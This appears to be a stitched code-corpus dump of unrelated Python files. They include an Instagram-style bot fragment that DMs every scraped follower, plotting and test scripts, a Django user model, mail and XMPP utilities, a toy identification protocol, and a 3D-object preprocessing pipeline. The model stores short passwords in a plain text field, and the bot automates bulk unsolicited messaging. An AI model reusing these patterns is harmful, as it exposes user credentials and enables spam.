    narrowed the bare ``except`` to ``Exception`` so KeyboardInterrupt is not
    swallowed.
    """
    print('---------- def sendDM init')
    startDriver()
    login(un, pw)
    try:
        for recipient in user:
            open(os.getcwd() + "/dmlog.txt", "a").write('Sending DM to %s \n' % recipient)
            dm(recipient, message)
    except Exception:
        # dm() raises when a profile cannot receive messages; report failure
        # instead of crashing the caller.
        return False
    return True
# open(os.getcwd()+"/dmlog.txt","a").write('Starting' )
# us=sys.argv[1]
# msg=sys.argv[2]
# un=sys.argv[3]
# pw=sys.argv[4]
# x=getFollowers(us)
# x=list(map(lambda y:y.text, x))
# sendDM(x,msg,un,pw)
#x=getFollowers("shanaka")
| 2.140625 | 2 |
scripts/dirichlet_3d_spiky_plot.py | karalleyna/pyprobml | 0 | 12765029 | <reponame>karalleyna/pyprobml
import numpy as np
import matplotlib.pyplot as plt
import pyprobml_utils as pml
from mpl_toolkits.mplot3d import proj3d
from scipy.stats import dirichlet
grain = 20 # how many points along each axis to plot
edgedist = 0.008 # how close to an extreme value such as [1,0,0] we are willing to plot
# Barycentric coordinate grid along each simplex edge.
weight = np.linspace(0, 1, grain)
# Most extreme corners of the sample space (pulled slightly inside the simplex
# by edgedist so the Dirichlet pdf stays finite).
Corner1 = np.array([1.0 - edgedist*2, edgedist, edgedist])
Corner2 = np.array([edgedist, 1.0 - edgedist*2, edgedist])
Corner3 = np.array([edgedist, edgedist, 1.0 - edgedist*2])
# Probability density function over 2D barycentric coordinates.
def dpdf(v1, v2, alphavec):
    """Dirichlet density at the simplex point spanned by (v1, v2).

    Returns NaN outside the simplex so the surface plot leaves a gap there.
    """
    if v1 + v2 > 1:
        return np.nan
    point = v1 * Corner1 + v2 * Corner2 + (1.0 - v1 - v2) * Corner3
    return dirichlet.pdf(point, alphavec)
# Dirichlet parameters: symmetric, skewed, and sparse (spiky) cases.
alphas = [ [20,20,20], [3,3,20], [0.1,0.1,0.1] ]
for i in range(len(alphas)):
    alphavec = np.array(alphas[i])
    azim = 20
    # Evaluate the density on the (v1, v2) grid; NaNs leave gaps off-simplex.
    probs = np.array([dpdf(v1, v2, alphavec) for v1 in weight for v2 in weight]).reshape(-1,grain)
    fig = plt.figure(figsize=(20,15))
    ax = fig.add_subplot(111, projection='3d')
    X,Y = np.meshgrid(weight, weight)
    ax.plot_surface(Y, X, probs, cmap = 'jet', vmin=0, vmax=3,rstride=1,cstride=1, linewidth=0)
    ax.view_init(elev=25, azim=azim)
    ax.set_zlabel('p')
    ttl = ','.join(['{:0.2f}'.format(d) for d in alphavec])
    ax.set_title(ttl)
    # Encode alpha[0]*10 in the output filename (e.g. alpha=2.0 -> 20).
    alpha = int(np.round(alphavec[0]*10))
    pml.savefig('dirSimplexAlpha{}.pdf'.format(alpha))
    plt.show()
# Dead code kept for reference: alternate view angle of the last surface.
if 0:
    fig = plt.figure(figsize=(20,15))
    ax = fig.add_subplot(111, projection='3d')
    ax.plot_surface(Y, X, probs, cmap = 'jet', vmin=0, vmax=3,rstride=1,cstride=1, linewidth=0)
    ax.view_init(elev=25, azim=200)
    ax.set_zlabel('p')
    ttl = ','.join(['{:0.2f}'.format(d) for d in alphavec])
    ax.set_title(ttl)
    alpha = np.round(alphavec[0]*10)
    pml.savefig('alpha.pdf')
    plt.show()
| 2.359375 | 2 |
tests/test_core.py | mathbou/seed_intersphinx_mapping | 3 | 12765030 | <reponame>mathbou/seed_intersphinx_mapping
# stdlib
from typing import get_type_hints
# 3rd party
import packaging.requirements
import pytest
from coincidence import PEP_563
# this package
from seed_intersphinx_mapping import cache, get_sphinx_doc_url
def test_get_sphinx_doc_url():
    """Exercise PyPI lookup success/failure paths (requires network access)."""
    assert cache.clear(get_sphinx_doc_url)
    # Underscore and hyphen spellings resolve to the same project.
    assert get_sphinx_doc_url("domdf_python_tools") == "https://domdf-python-tools.readthedocs.io/en/latest/"
    assert get_sphinx_doc_url("domdf-python-tools") == "https://domdf-python-tools.readthedocs.io/en/latest/"
    with pytest.raises(packaging.requirements.InvalidRequirement, match="No such project 'domdf_python_toolsz'"):
        get_sphinx_doc_url("domdf_python_toolsz")
    with pytest.raises(ValueError, match="Documentation URL not found in data from PyPI."):
        get_sphinx_doc_url("slumber")
    # isort publishes docs but no Sphinx objects.inv.
    with pytest.raises(ValueError, match="objects.inv not found at url .*: HTTP Status 404"):
        get_sphinx_doc_url("isort")
    assert cache.clear(get_sphinx_doc_url)
    assert not (cache.cache_dir / "get_sphinx_doc_url.json").is_file()
    with pytest.raises(ValueError, match="Documentation URL not found in data from PyPI."):
        get_sphinx_doc_url("sphinx-prompt")
def test_get_sphinx_doc_url_wrapping():
    """The caching decorator must preserve the wrapped function's metadata."""
    assert get_sphinx_doc_url.__name__ == "get_sphinx_doc_url"
    # Under PEP 563 (postponed evaluation) annotations are stored as strings.
    if PEP_563:
        assert get_sphinx_doc_url.__annotations__ == {"pypi_name": "str", "return": "str"}
    else:
        assert get_sphinx_doc_url.__annotations__ == {"pypi_name": str, "return": str}
    assert get_type_hints(get_sphinx_doc_url) == {"pypi_name": str, "return": str}
    assert get_sphinx_doc_url.__defaults__ is None
    assert get_sphinx_doc_url.__doc__.startswith("\n	Returns the URL to the given project's Sphinx documentation.")
    assert get_sphinx_doc_url.__wrapped__
| 2.09375 | 2 |
FairTest/users/models.py | RexWangSida/FairTest | 3 | 12765031 | <gh_stars>1-10
from django.db import models
from django_mysql.models import ListCharField
# Create your models here.
class User(models.Model):
    """A registered user identified by a unique ``uid`` (primary key)."""
    email = models.CharField(max_length = 60, unique=True)
    uid = models.CharField(max_length = 10, unique=True, primary_key=True)
    school = models.CharField(max_length = 30)
    # NOTE(review): stored as a plain CharField (max 6 chars) — appears to be
    # an unhashed password; confirm whether hashing is handled elsewhere.
    password = models.CharField(max_length = 6)
    firstName = models.CharField(max_length = 30)
    lastName = models.CharField(max_length = 30)
    # IDs of tests the user is registered for.
    regTests = ListCharField(
        base_field=models.CharField(max_length=10),
        size=10,
        max_length=(10 * 11)  # 10 values of up to 10 characters, plus commas
    )
    def __str__(self):
        """Display the user's full name."""
        return self.firstName + " " + self.lastName
| 2.53125 | 3 |
tests/resources/xmpp_handlers.py | pombreda/tipfy | 23 | 12765032 | from tipfy.appengine.xmpp import BaseHandler, CommandHandler
class XmppHandler(CommandHandler):
    """XMPP handler: acknowledges /foo and /bar, echoes other text messages."""

    def foo_command(self, message):
        """Reply to the /foo command."""
        message.reply('Foo command!')

    def bar_command(self, message):
        """Reply to the /bar command."""
        message.reply('Bar command!')

    def text_message(self, message):
        """Run the default text handling, then echo the body back to the sender."""
        super(XmppHandler, self).text_message(message)
        body = message.body
        message.reply(body)
class XmppHandler2(BaseHandler):
    """Bare BaseHandler subclass; exists so tests can reference a second handler."""
    pass
| 2.515625 | 3 |
vial-plugin/mail/api.py | baverman/vial-mail | 1 | 12765033 | <reponame>baverman/vial-mail<gh_stars>1-10
import os.path
from email.parser import HeaderParser
from email.utils import getaddresses
from email.header import decode_header
from unidecode import unidecode
def get_book(fname):
    """Parse a tab-separated address book into sorted (search_key, address) pairs.

    Each line is "addr<TAB>title". Python 2 code: titles are byte strings
    decoded as UTF-8 with a cp1251 fallback; the search key is a lowercase
    ASCII transliteration of "addr title".
    """
    result = []
    for line in open(fname):
        addr, title = line.rstrip('\r\n').split('\t')
        try:
            title = title.decode('utf-8')
        except UnicodeDecodeError:
            title = title.decode('cp1251')
        result.append(('{} {}'.format(addr, unidecode(title)).lower(),
                       '{} <{}>'.format(title.encode('utf-8'), addr) if title else addr))
    return sorted(result)
def dheader(header):
    """Decode an RFC 2047 encoded header into a UTF-8 byte string (Python 2).

    Each decoded part defaults to ASCII when no charset is declared.
    """
    parts = decode_header(header)
    result = u''
    for r, enc in parts:
        enc = enc or 'ascii'
        result += r.decode(enc)
    return result.encode('utf-8')
def get_addresses(maildir):
    """Yield (address, title) pairs collected from all messages under ``maildir``.

    Scans every file's From/To/Cc/Resent-* headers (Python 2: uses
    ``dict.iteritems``). Titles are decoded when RFC 2047 encoded, stripped of
    quoting, and deduplicated; addresses with no usable title yield ('addr', '').
    """
    emails = {}
    for root, _dirs, files in os.walk(maildir):
        for fname in files:
            fname = os.path.join(root, fname)
            # Only headers are needed, so avoid parsing message bodies.
            msg = HeaderParser().parse(open(fname))
            froms = msg.get_all('from', [])
            tos = msg.get_all('to', [])
            ccs = msg.get_all('cc', [])
            resent_tos = msg.get_all('resent-to', [])
            resent_ccs = msg.get_all('resent-cc', [])
            all_recipients = getaddresses(froms + tos + ccs + resent_tos + resent_ccs)
            for (title, addr) in all_recipients:
                emails.setdefault(addr, set()).add(title)
    for addr, titles in emails.iteritems():
        clean = set()
        for title in titles:
            # '=?' marks an RFC 2047 encoded-word; decode it first.
            if title.startswith('=?'):
                title = dheader(title)
            title = title.strip("'\"<>").replace('\n', ' ')
            if title and title != addr:
                clean.add(title)
        if clean:
            for title in clean:
                yield addr, title
        else:
            yield addr, ''
| 2.5 | 2 |
examples/deck_of_cards_gui.py | Ellis0817/Introduction-to-Programming-Using-Python | 0 | 12765034 | """Dock of card GUI."""
import random
from tkinter import Button # Import tkinter
from tkinter import Frame # Import tkinter
from tkinter import Label # Import tkinter
from tkinter import LEFT # Import tkinter
from tkinter import PhotoImage
from tkinter import Tk # Import tkinter
class DeckOfCardsGUI(object):
    """Tkinter window showing four cards with a Shuffle button.

    Note: the constructor enters ``mainloop`` and blocks until the window closes.
    """
    def __init__(self):
        """Build the window, load the 52 card images, and start the event loop."""
        window = Tk()  # Create a window
        window.title("Pick Four Cards Randomly")  # Set title
        self.image_list = []  # Store images for cards
        for i in range(1, 53):
            self.image_list.append(PhotoImage(
                file="image/card/" + str(i) + ".gif"))
        frame = Frame(window)  # Hold four labels for cards
        frame.pack()
        self.label_list = []  # A list of four labels
        for i in range(4):
            self.label_list.append(Label(frame, image=self.image_list[i]))
            self.label_list[i].pack(side=LEFT)
        Button(window, text="Shuffle", command=self.shuffle).pack()
        window.mainloop()  # Create an event loop
    def shuffle(self):
        """Choose four random cards by shuffling the image list in place."""
        random.shuffle(self.image_list)
        for i in range(4):
            self.label_list[i]["image"] = self.image_list[i]
DeckOfCardsGUI()  # Create GUI (blocks in mainloop)
| 3.375 | 3 |
app/utils/assets.py | coolpalani/Flask-Salt | 12 | 12765035 | #!/usr/bin/env python3
# -*- coding:utf-8 -*-
# __author__: Yxn
# date: 2016/10/14
from flask_assets import Bundle
# Flask-Assets bundles: concatenate + minify the shared CSS/JS for all pages.
bundles = {
    'common_css': Bundle(
        'css/body.css',
        'css/lib/adminlte/adminlte.min.css',
        'css/lib/bootstrap/bootstrap.min.css',
        'css/lib/skins/skin-blue.min.css',
        'css/lib/fontawesome/font-awesome.min.css',
        output='css/common.css',
        filters='cssmin'
    ),
    'common_js': Bundle(
        'js/lib/jquery/jquery.min.js',
        'js/lib/app/app.min.js',
        'js/lib/bootstrap/bootstrap.min.js',
        'js/lib/validate/jquery.validate.js',
        output='js/common.js',
        filters='jsmin'
    ),
}
| 1.539063 | 2 |
alice.py | finnsjames/ssn | 0 | 12765036 | import govt
import service
from cryptography.hazmat.primitives.asymmetric import dh
import tools
def print_as_hex(data: bytes) -> None:
    """Print *data* as a lowercase hexadecimal string."""
    hex_text = data.hex()
    print(hex_text)
def main():
    """Run one round of the Schnorr-style identification protocol for Alice.

    Generates group parameters, registers an SSN with the government, then
    proves knowledge of the SSN to the service. Returns 0 on successful
    verification, 1 on failure.
    """
    NAME = "Alice"
    # TODO: This is just to get a large prime number
    params = dh.generate_parameters(generator=2, key_size=512)
    p = params.parameter_numbers().p
    # Squaring a random element yields a quadratic residue mod p.
    g = pow(tools.get_random_int(p), 2, p)
    q = int((p + 1) / 2) - 1
    print(f"{pow(g, q - 1, p)==g}")
    print(f"g={g}, p={p}, q={q}")
    # generate SSN
    my_govt = govt.Govt()
    ssn = my_govt.register(NAME, q)
    my_service = service.Service()
    uid = my_service.new_user(NAME)
    # Commitment A = g^r; response z answers challenge c.
    r = tools.get_random_int(q)
    Y = pow(g, ssn, p)
    A = pow(g, r, p)
    c = my_service.get_challenge(uid, Y, A, q)
    # NOTE(review): precedence makes this r + ((c * ssn) % p); confirm whether
    # (r + c * ssn) % p was intended.
    z = r + (c * ssn) % p
    if my_service.verify(uid, g, p, z):
        print("Successfully verified!\n")
        return 0
    else:
        print("Failed to verify!\n")
        return 1
    # show credentials anonymously
# show credentials anonymously
if __name__ == "__main__":
    # Run the protocol repeatedly; stop at the first verification failure.
    REPETITIONS = 100
    for i in range(REPETITIONS):
        if main() > 0:
            break
| 2.875 | 3 |
preprocess/proc_stage2.py | 3dlg-hcvc/ANCSH-pytorch | 2 | 12765037 | import os
import h5py
import pandas as pd
import logging
import numpy as np
from progress.bar import Bar
from multiprocessing import Pool, cpu_count
from omegaconf import OmegaConf
from tools.utils import io
# from ANCSH_lib.utils import NetworkType
# from tools.visualization import Viewer, ANCSHVisualizer
import utils
from utils import JointType
log = logging.getLogger('proc_stage2')
class ProcStage2Impl:
    def __init__(self, cfg):
        """Copy stage-2 paths and parameters from the (OmegaConf) config object."""
        self.output_path = cfg.output_path
        self.input_h5_path = cfg.input_h5_path
        self.stage1_tmp_dir = cfg.stage1_tmp_dir
        self.tmp_output_dir = cfg.tmp_output_dir
        self.rest_state_data_filename = cfg.rest_state_data_filename
        self.object_infos_path = cfg.object_infos_path
        self.heatmap_threshold = cfg.heatmap_threshold
        # Small constant guarding divisions (see commented clip in get_joint_params).
        self.epsilon = 10e-8
        self.export = cfg.export
@staticmethod
def get_joint_params(vertices, joint, selected_vertices):
heatmap = -np.ones((vertices.shape[0]))
unitvec = np.zeros((vertices.shape[0], 3))
joint_pos = joint['abs_position']
joint_axis = joint['axis']
joint_axis = joint_axis / np.linalg.norm(joint_axis)
joint_axis = joint_axis.reshape((3, 1))
if joint['type'] == JointType.revolute.value:
vec1 = vertices - joint_pos
# project to joint axis
proj_len = np.dot(vec1, joint_axis)
# np.clip(proj_len, a_min=self.epsilon, a_max=None, out=proj_len)
proj_vec = proj_len * joint_axis.transpose()
orthogonal_vec = - vec1 + proj_vec
tmp_heatmap = np.linalg.norm(orthogonal_vec, axis=1).reshape(-1, 1)
tmp_unitvec = orthogonal_vec / tmp_heatmap
heatmap[selected_vertices] = tmp_heatmap[selected_vertices].reshape(-1)
unitvec[selected_vertices] = tmp_unitvec[selected_vertices]
elif joint['type'] == JointType.prismatic.value:
heatmap[selected_vertices] = 0
unitvec[selected_vertices] = joint_axis.transpose()
else:
log.error(f'Invalid joint type {joint["axis"]}')
heatmap = np.where(heatmap >= 0, heatmap, np.inf)
return heatmap, unitvec
def __call__(self, idx, input_data):
input_h5 = h5py.File(self.input_h5_path, 'r')
object_infos = io.read_json(self.object_infos_path)
output_filepath = os.path.splitext(self.output_path)[0] + f'_{idx}' + os.path.splitext(self.output_path)[-1]
h5file = h5py.File(output_filepath, 'w')
bar = Bar(f'Stage2 Processing chunk {idx}', max=len(input_data))
for index, row in input_data.iterrows():
instance_name = f'{row["objectCat"]}_{row["objectId"]}_{row["articulationId"]}_{row["frameId"]}'
in_h5frame = input_h5[instance_name]
mask = in_h5frame['mask'][:]
points_camera = in_h5frame['points_camera'][:]
points_rest_state = in_h5frame['points_rest_state'][:]
parts_camera2rest_state = in_h5frame['parts_transformation'][:]
camera2base = in_h5frame['base_transformation'][:]
stage1_tmp_data_dir = os.path.join(self.stage1_tmp_dir, row['objectCat'], row['objectId'])
rest_state_data_path = os.path.join(stage1_tmp_data_dir, self.rest_state_data_filename)
rest_state_data = io.read_json(rest_state_data_path)
part_info = object_infos[row['objectCat']][row['objectId']]['part']
num_parts = len(part_info)
# process points related ground truth
object_info = object_infos[row['objectCat']][row['objectId']]['object']
# diagonal axis aligned bounding box length to 1
# (0.5, 0.5, 0.5) centered
naocs_translation = - np.asarray(object_info['center']) + 0.5 * object_info['scale']
naocs_scale = 1.0 / object_info['scale']
naocs = points_rest_state + naocs_translation
naocs *= naocs_scale
naocs_transformation = np.reshape(camera2base, (4, 4), order='F')
naocs_transformation[:3, 3] += naocs_translation
naocs2cam_transformation = np.linalg.inv(naocs_transformation).flatten('F')
naocs2cam_scale = 1.0 / naocs_scale
points_class = np.empty_like(mask)
npcs = np.empty_like(points_rest_state)
parts_npcs2cam_transformation = np.empty_like(parts_camera2rest_state)
parts_npcs2cam_scale = np.empty(num_parts)
parts_min_bounds = np.empty((num_parts, 3))
parts_max_bounds = np.empty((num_parts, 3))
for link_index, link in enumerate(rest_state_data['links']):
if link['virtual']:
continue
link_index_key = str(link_index)
part_points = points_rest_state[mask == link_index]
center = np.asarray(part_info[link_index_key]['center'])
# diagonal axis aligned bounding box length to 1
# (0.5, 0.5, 0.5) centered
npcs_translation = - center + 0.5 * part_info[link_index_key]['scale']
npcs_scale = 1.0 / part_info[link_index_key]['scale']
part_points_norm = part_points + npcs_translation
part_points_norm *= npcs_scale
npcs[mask == link_index] = part_points_norm
part_class = part_info[link_index_key]['part_class']
points_class[mask == link_index] = part_class
npcs_transformation = np.reshape(parts_camera2rest_state[link['part_index']], (4, 4), order='F')
npcs_transformation[:3, 3] += npcs_translation
npcs2cam_transformation = np.linalg.inv(npcs_transformation)
parts_npcs2cam_transformation[part_class] = npcs2cam_transformation.flatten('F')
parts_npcs2cam_scale[part_class] = 1.0 / npcs_scale
parts_min_bounds[part_class] = np.asarray(part_info[link_index_key]['min_bound'])
parts_max_bounds[part_class] = np.asarray(part_info[link_index_key]['max_bound'])
# process joints related ground truth
link_names = [link['name'] for link in rest_state_data['links']]
# transform joints to naocs space
# viewer = Viewer()
naocs_joints = rest_state_data['joints']
for i, joint in enumerate(rest_state_data['joints']):
if not joint:
continue
joint_pose = np.asarray(joint['pose2link']).reshape((4, 4), order='F')
joint_parent = joint['parent']
parent_link = rest_state_data['links'][link_names.index(joint_parent)]
parent_link_abs_pose = np.asarray(parent_link['abs_pose']).reshape((4, 4), order='F')
joint_abs_pose = np.dot(parent_link_abs_pose, joint_pose)
joint_pos = joint_abs_pose[:3, 3]
naocs_joint_pos = joint_pos + naocs_translation
naocs_joint_pos *= naocs_scale
joint_axis = np.dot(joint_abs_pose[:3, :3], joint['axis'])
joint_axis = joint_axis / np.linalg.norm(joint_axis)
naocs_joints[i]['abs_position'] = naocs_joint_pos
naocs_joints[i]['axis'] = joint_axis
joint_child = joint['child']
child_link_class = part_info[str(link_names.index(joint_child))]['part_class']
joint_class = child_link_class
naocs_joints[i]['class'] = joint_class
joint_type = JointType[joint['type']].value
naocs_joints[i]['type'] = joint_type
# if self.export:
# viewer.add_trimesh_arrows([naocs_joint_pos], [joint_axis], color=Viewer.rgba_by_index(joint_class))
# if self.export:
# tmp_data_dir = os.path.join(self.tmp_output_dir, row['objectCat'], row['objectId'],
# row['articulationId'])
# io.ensure_dir_exists(tmp_data_dir)
# viewer.export(os.path.join(tmp_data_dir, instance_name + '_naocs_arrows.ply'))
valid_joints = [joint for joint in naocs_joints if joint if joint['type'] >= 0]
num_valid_joints = len(valid_joints)
tmp_heatmap = np.empty((num_valid_joints, naocs.shape[0]))
tmp_unitvec = np.empty((num_valid_joints, naocs.shape[0], 3))
for i, joint in enumerate(valid_joints):
joint_class = joint['class']
parent_links = [i for i, link in enumerate(rest_state_data['links'])
if link if not link['virtual'] if joint['parent'] == link['name']]
child_links = [i for i, link in enumerate(rest_state_data['links'])
if link if not link['virtual'] if joint['child'] == link['name']]
connected_links = parent_links + child_links
part_classes = [part_info[str(link_index)]['part_class'] for link_index in connected_links]
if joint['type'] == JointType.prismatic.value:
part_classes = [part_class for part_class in part_classes if part_class == joint_class]
selected_vertex_indices = np.isin(points_class, part_classes)
part_heatmap, part_unitvec = ProcStage2Impl.get_joint_params(naocs, joint, selected_vertex_indices)
tmp_heatmap[joint_class - 1] = part_heatmap
tmp_unitvec[joint_class - 1] = part_unitvec
joints_association = tmp_heatmap.argmin(axis=0)
points_heatmap = tmp_heatmap[joints_association, np.arange(naocs.shape[0])]
points_unitvec = tmp_unitvec[joints_association, np.arange(naocs.shape[0])]
points_unitvec[points_heatmap >= self.heatmap_threshold] = np.zeros(3)
joints_association[points_heatmap >= self.heatmap_threshold] = -1
points_heatmap_result = 1.0 - points_heatmap / self.heatmap_threshold
points_heatmap_result[points_heatmap >= self.heatmap_threshold] = -1
# points with no joint association has value 0
joints_association += 1
joints_axis = np.zeros((naocs.shape[0], 3))
joint_types = -np.ones(num_parts)
for joint in naocs_joints:
if joint:
joints_axis[joints_association == joint['class']] = joint['axis']
joint_types[joint['class']] = joint['type']
h5frame = h5file.require_group(instance_name)
h5frame.attrs['objectCat'] = row["objectCat"]
h5frame.attrs['objectId'] = row["objectId"]
h5frame.attrs['articulationId'] = row["articulationId"]
h5frame.attrs['frameId'] = row["frameId"]
h5frame.attrs['numParts'] = num_parts
h5frame.attrs['id'] = instance_name
h5frame.create_dataset("seg_per_point", shape=points_class.shape, data=points_class, compression="gzip")
h5frame.create_dataset("camcs_per_point", shape=points_camera.shape, data=points_camera, compression="gzip")
h5frame.create_dataset("npcs_per_point", shape=npcs.shape, data=npcs, compression="gzip")
h5frame.create_dataset("naocs_per_point", shape=naocs.shape, data=naocs, compression="gzip")
h5frame.create_dataset("heatmap_per_point", shape=points_heatmap_result.shape, data=points_heatmap_result,
compression="gzip")
h5frame.create_dataset("unitvec_per_point", shape=points_unitvec.shape, data=points_unitvec,
compression="gzip")
h5frame.create_dataset("axis_per_point", shape=joints_axis.shape, data=joints_axis,
compression="gzip")
h5frame.create_dataset("joint_cls_per_point", shape=joints_association.shape, data=joints_association,
compression="gzip")
h5frame.create_dataset("joint_type", shape=joint_types.shape, data=joint_types, compression="gzip")
# 6D transformation from npcs to camcs
h5frame.create_dataset("npcs2cam_rt", shape=parts_npcs2cam_transformation.shape,
data=parts_npcs2cam_transformation, compression="gzip")
# scale from npcs to camcs
h5frame.create_dataset("npcs2cam_scale", shape=parts_npcs2cam_scale.shape, data=parts_npcs2cam_scale,
compression="gzip")
h5frame.create_dataset("naocs2cam_rt", shape=naocs2cam_transformation.shape,
data=naocs2cam_transformation, compression="gzip")
h5frame.create_dataset("naocs2cam_scale", shape=(1,), data=naocs2cam_scale,
compression="gzip")
norm_factors = 1.0 / parts_npcs2cam_scale
h5frame.create_dataset("norm_factors", shape=norm_factors.shape, data=norm_factors,
compression="gzip")
# part bounds at rest state
norm_corners = np.stack((parts_min_bounds, parts_max_bounds), axis=1)
h5frame.create_dataset("norm_corners", shape=norm_corners.shape, data=norm_corners,
compression="gzip")
bar.next()
bar.finish()
h5file.close()
input_h5.close()
return output_filepath
class ProcStage2:
    """Stage-2 preprocessing driver.

    Splits the stage-1 instances into train/val/test sets
    (:meth:`split_data`), then for each set gathers per-object mesh/part
    metadata and fans the frames out to ``ProcStage2Impl`` workers which
    write the final ANCSH ground-truth h5 files (:meth:`process_set`).
    """

    def __init__(self, cfg):
        """Cache config-derived paths and parameters.

        :param cfg: OmegaConf config with ``paths.preprocess`` and
            ``params`` sections.
        """
        self.cfg = cfg
        self.input_cfg = self.cfg.paths.preprocess.stage2.input
        self.input_h5_path = os.path.join(self.cfg.paths.preprocess.output_dir, self.input_cfg.pcd_data)
        self.output_dir = self.cfg.paths.preprocess.output_dir
        self.stag1_tmp_output = self.cfg.paths.preprocess.stage1.tmp_output
        self.tmp_output = self.cfg.paths.preprocess.stage2.tmp_output
        # Populated by split_data(); consumed by process().
        self.split_info = None
        self.debug = self.cfg.debug
        self.show = self.cfg.show
        self.export = self.cfg.export
        stage1_input = self.cfg.paths.preprocess.stage1.input
        self.part_orders = io.read_json(os.path.join(self.cfg.paths.preprocess.input_dir, stage1_input.part_order_file))
        self.heatmap_threshold = self.cfg.params.joint_association_threshold

    def split_data(self, train_percent=.6, split_on='objectId', seed=None):
        """Partition instances into train/val/test and record the split.

        If a split-info CSV already exists (stage2 input config) it is
        reused; otherwise a random split is drawn at the granularity given
        by *split_on* ('objectId', 'articulationId' or 'frameId'), with the
        remainder after *train_percent* divided evenly between val and test.
        The resulting split is stored on ``self.split_info`` and written to
        the stage-2 output CSV.

        :param train_percent: float, fraction of keys assigned to train.
        :param split_on: str, column granularity at which to split.
        :param seed: optional int, random state for reproducible sampling.
        """
        instances = []
        # h5py visititems callback: collect every group name (one per frame).
        visit_groups = lambda name, node: instances.append(name) if isinstance(node, h5py.Group) else None
        input_h5 = h5py.File(self.input_h5_path, 'r')
        input_h5.visititems(visit_groups)
        # Group names encode cat_objectId_articulationId_frameId.
        df_dataset = pd.DataFrame([name.split('_') for name in instances],
                                  columns=['objectCat', 'objectId', 'articulationId', 'frameId'])
        df_dataset = df_dataset.drop_duplicates(ignore_index=True)
        # select data in config
        selected_categories = df_dataset['objectCat'].isin(self.cfg.settings.categories) \
            if len(self.cfg.settings.categories) > 0 else df_dataset['objectCat'].astype(bool)
        selected_object_ids = df_dataset['objectId'].isin(self.cfg.settings.object_ids) \
            if len(self.cfg.settings.object_ids) > 0 else df_dataset['objectId'].astype(bool)
        selected_articulation_ids = df_dataset['articulationId'].isin(self.cfg.settings.articulation_ids) \
            if len(self.cfg.settings.articulation_ids) > 0 else df_dataset['articulationId'].astype(bool)
        df_dataset = df_dataset[selected_categories & selected_object_ids & selected_articulation_ids]
        if io.file_exist(self.cfg.paths.preprocess.stage2.input.split_info, ext='.csv'):
            # Reuse an externally provided split.
            input_split_info = pd.read_csv(self.cfg.paths.preprocess.stage2.input.split_info, dtype=object)
            split_on_columns = ['objectCat', 'objectId', 'articulationId', 'frameId']
            train_set = input_split_info[input_split_info["set"] == "train"]
            val_set = input_split_info[input_split_info["set"] == "val"]
            test_set = input_split_info[input_split_info["set"] == "test"]
            train = train_set.merge(df_dataset, how='left', on=split_on_columns)
            val = val_set.merge(df_dataset, how='left', on=split_on_columns)
            test = test_set.merge(df_dataset, how='left', on=split_on_columns)
            self.split_info = pd.concat([train, val, test], keys=["train", "val", "test"], names=['set', 'index'])
        else:
            # split to train, val, test
            log.info(f'Split on key {split_on}')
            if len(df_dataset):
                if split_on == 'objectId':
                    split_on_columns = ['objectCat', 'objectId']
                elif split_on == 'articulationId':
                    split_on_columns = ['objectCat', 'objectId', 'articulationId']
                elif split_on == 'frameId':
                    split_on_columns = ['objectCat', 'objectId', 'articulationId', 'frameId']
                else:
                    split_on_columns = ['objectCat', 'objectId']
                    log.warning(f'Cannot parse split_on {split_on}, split on objectId by default')
                # val gets half of the non-train remainder; test the rest.
                val_end = train_percent + (1.0 - train_percent) / 2.0
                split_df = df_dataset[split_on_columns].drop_duplicates()
                set_size = len(split_df)
                # Shuffle the unique keys, then cut at train / val boundaries.
                train_set, val_set, test_set = np.split(
                    split_df.sample(frac=1.0, random_state=seed),
                    [int(train_percent * set_size), int(val_end * set_size)]
                )
                train = train_set.merge(df_dataset, how='left', on=split_on_columns)
                val = val_set.merge(df_dataset, how='left', on=split_on_columns)
                test = test_set.merge(df_dataset, how='left', on=split_on_columns)
                self.split_info = pd.concat([train, val, test], keys=["train", "val", "test"], names=['set', 'index'])
            else:
                log.error('No data to split!')
                return
        self.split_info.to_csv(os.path.join(self.output_dir, self.cfg.paths.preprocess.stage2.output.split_info))

    def process(self):
        """Process the train, val and test sets recorded by split_data()."""
        io.ensure_dir_exists(self.output_dir)
        if self.split_info is None or self.split_info.empty:
            log.error('No data to process!')
            return
        train = self.split_info.loc['train']
        log.info(f'Stage2 Process Train Set {len(train)} instances')
        self.process_set(train, self.output_dir, self.cfg.paths.preprocess.stage2.output.train_data)
        val = self.split_info.loc['val']
        log.info(f'Stage2 Process Val Set {len(val)} instances')
        self.process_set(val, self.output_dir, self.cfg.paths.preprocess.stage2.output.val_data)
        test = self.split_info.loc['test']
        log.info(f'Stage2 Process Test Set {len(test)} instances')
        self.process_set(test, self.output_dir, self.cfg.paths.preprocess.stage2.output.test_data)

    def process_set(self, input_data, output_dir, output_filename):
        """Process one split into a single merged h5 file.

        Gathers per-object mesh/part metadata, shards *input_data* into
        chunks, runs ``ProcStage2Impl`` over the chunks in a process pool,
        then merges the per-chunk h5 files into ``output_dir/output_filename``.

        :param input_data: DataFrame of frames belonging to this split.
        :param output_dir: str, directory for the merged h5 file.
        :param output_filename: str, name of the merged h5 file.
        """
        # process object info
        object_df = input_data[['objectCat', 'objectId']].drop_duplicates()
        object_infos = {}
        bar = Bar('Stage2 Parse Object Infos', max=len(object_df))
        for index, row in object_df.iterrows():
            stage1_tmp_data_dir = os.path.join(self.cfg.paths.preprocess.tmp_dir, self.stag1_tmp_output.folder_name,
                                               row['objectCat'], row['objectId'])
            rest_state_data_path = os.path.join(stage1_tmp_data_dir, self.stag1_tmp_output.rest_state_data)
            rest_state_data = io.read_json(rest_state_data_path)
            object_mesh_path = os.path.join(stage1_tmp_data_dir, self.stag1_tmp_output.rest_state_mesh)
            object_dict = utils.get_mesh_info(object_mesh_path)
            part_dict = {}
            part_order = None
            if self.part_orders:
                part_order = self.part_orders[row['objectCat']][row['objectId']]
            part_index = 0
            for link_index, link in enumerate(rest_state_data['links']):
                if link['virtual']:
                    continue
                part_mesh_path = os.path.join(stage1_tmp_data_dir,
                                              f'{link["name"]}_{self.stag1_tmp_output.rest_state_mesh}')
                part_dict[link_index] = utils.get_mesh_info(part_mesh_path)
                # part_class comes from the configured part order when
                # available; otherwise parts are numbered in link order.
                if part_order:
                    part_dict[link_index]['part_class'] = part_order.index(link['part_index'])
                else:
                    part_dict[link_index]['part_class'] = part_index
                    part_index += 1
            if row['objectCat'] in object_infos:
                object_infos[row['objectCat']][row['objectId']] = {'object': object_dict, 'part': part_dict}
            else:
                object_infos[row['objectCat']] = {row['objectId']: {'object': object_dict, 'part': part_dict}}
            bar.next()
        bar.finish()

